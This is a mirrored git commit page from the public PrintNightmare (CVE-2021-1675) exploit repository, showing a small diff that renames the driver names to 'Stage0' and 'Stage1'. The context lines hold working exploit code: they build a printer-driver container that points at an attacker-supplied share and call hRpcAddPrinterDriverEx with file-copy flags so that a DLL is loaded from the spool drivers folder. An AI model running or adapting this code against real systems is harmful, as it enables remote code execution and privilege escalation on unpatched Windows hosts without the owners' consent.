mirror of
https://github.com/cube0x0/CVE-2021-1675.git
synced 2024-12-23 03:06:33 +00:00
Add name
This commit is contained in:
parent
74030a63c1
commit
b33e65a34e
1 changed files with 2 additions and 1 deletions
|
@ -72,7 +72,7 @@ def main(dce, pDriverPath, share, handle=NULL):
|
||||||
container_info['Level'] = 2
|
container_info['Level'] = 2
|
||||||
container_info['DriverInfo']['tag'] = 2
|
container_info['DriverInfo']['tag'] = 2
|
||||||
container_info['DriverInfo']['Level2']['cVersion'] = 3
|
container_info['DriverInfo']['Level2']['cVersion'] = 3
|
||||||
container_info['DriverInfo']['Level2']['pName'] = "1234\x00"
|
container_info['DriverInfo']['Level2']['pName'] = "Stage0\x00"
|
||||||
container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
|
container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
|
||||||
container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00'
|
container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00'
|
||||||
container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
|
container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
|
||||||
|
@ -85,6 +85,7 @@ def main(dce, pDriverPath, share, handle=NULL):
|
||||||
print("[*] Stage0: {0}".format(resp['ErrorCode']))
|
print("[*] Stage0: {0}".format(resp['ErrorCode']))
|
||||||
|
|
||||||
# Just ask for a new driver with already installed files
|
# Just ask for a new driver with already installed files
|
||||||
|
container_info['DriverInfo']['Level2']['pName'] = "Stage1\x00"
|
||||||
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)
|
||||||
flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000
|
flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000
|
||||||
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
|
||||||
|
|
Loading…
Reference in a new issue